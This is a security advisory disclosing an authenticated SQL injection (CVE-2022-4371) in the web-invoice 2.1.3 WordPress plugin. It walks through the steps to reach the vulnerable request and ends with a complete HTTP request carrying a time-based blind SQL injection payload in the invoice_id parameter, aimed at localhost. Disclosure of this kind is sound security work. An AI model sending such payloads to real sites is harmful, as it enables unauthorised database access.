web-invoice 2.1.3 (1/2) WordPress plugin SQL injection

Vulnerability Metadata

Key Value
Date of Disclosure December 12 2022
Affected Software web-invoice
Affected Software Type WordPress plugin
Version 2.1.3
Weakness SQL Injection
CVE ID CVE-2022-4371
CVSS 3.x Base Score n/a
CVSS 2.0 Base Score n/a
Reporter Daniel Krohmer, Kunal Sharma
Reporter Contact daniel.krohmer@iese.fraunhofer.de
Link to Affected Software https://wordpress.org/plugins/web-invoice
Link to Vulnerability DB https://nvd.nist.gov/vuln/detail/CVE-2022-4371

Vulnerability Description

The invoice_id query parameter in web-invoice 2.1.3 is vulnerable to to SQL injection. An authenticated attacker may abuse the new_web_invoice page of the plugin to craft a malicious GET request. Depending on the plugin settings, this attack may impact any user role (subscriber or higher).

Exploitation Guide

This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.

In the plugin settings, any user role can be assigned to invoice management. In this example, we use a low-privilege Subscriber role.


Create a new invoice for an arbitrary user:


Fill out the form and submit the invoice by clicking on Save and Preview:


Go to the invoice overview by clicking on Web Invoice, then click on the subject that has just been created.


Scroll down and hit Clear Log:


Clicking the previous button triggers the vulnerable request. invoide_id is the vulnerable query parameter


A POC may look like the following request:


In the code, the vulnerability is triggered by unsanitized user input of invoice_id at line 40 in ./Flow.php.


In ./Functions.php at line 75, the parameter is passed to the function web_invoice_show_message.


In this function, the malicious database is crafted at line 503 of ./Functions.php


Exploit Payload

Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

The SQL injection can be triggered by sending the request below.

GET /wp-admin/admin.php?page=new_web_invoice&invoice_id=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://localhost/wp-admin/admin.php?page=new_web_invoice&web_invoice_action=doInvoice&invoice_id=31618572
Cookie: wordpress_86a9106ae65537651a8e456835b316ab=subscriber%7C1669997060%7CQdxLUgq9Wz8z38XxdX2XGFlZGfCPfJ749H8TSkI3bVk%7C4d290f74d0fdee6ed52774b0827884c4a4ac8f0515fbe0c2ccd89c9093b52f90; wplrp_subscriber_id=6; wp_woocommerce_session_86a9106ae65537651a8e456835b316ab=1%7C%7C1669972640%7C%7C1669969040%7C%7C4e12cab99480b80c0ee581a6517239e4; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; wp-settings-time-1=1669802217; wp-settings-time-2=1669824525; XDEBUG_SESSION=netbeans-xdebug; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=subscriber%7C1669997060%7CQdxLUgq9Wz8z38XxdX2XGFlZGfCPfJ749H8TSkI3bVk%7C7264237c5bb535f6d1e5efa1bf3cb1db26c41b5a279f134aa8004c585e6e0ee7
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1